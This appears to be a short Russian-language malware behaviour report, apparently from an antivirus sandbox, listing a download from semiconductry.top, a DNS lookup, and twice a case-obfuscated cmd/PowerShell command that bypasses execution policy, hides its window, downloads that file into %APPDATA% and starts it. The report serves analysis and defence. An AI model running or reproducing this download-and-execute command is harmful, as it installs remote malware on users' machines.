Техническая информация
- http://semiconductry.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poWeRShEll.EXe -eXeCUtioNPolIcY byPAss -nOpROFILe -WiNdOWstYle HIDden (New-oBjeCT SYsTEm.NET.webClienT).DowNLoAdfILE('http://semiconductry.top/search.php','%apPDATA%.exE');STarT-...
- DNS ASK se####nductry.top
- '<SYSTEM32>\cmd.exe' /c "poWeRShEll.EXe -eXeCUtioNPolIcY byPAss -nOpROFILe -WiNdOWstYle HIDden (New-oBjeCT SYsTEm.NET.webClienT).DowNLoAdfILE('http://semiconductry.top/search.php','%apPDATA%.exE');STarT-...' (со скрытым окном)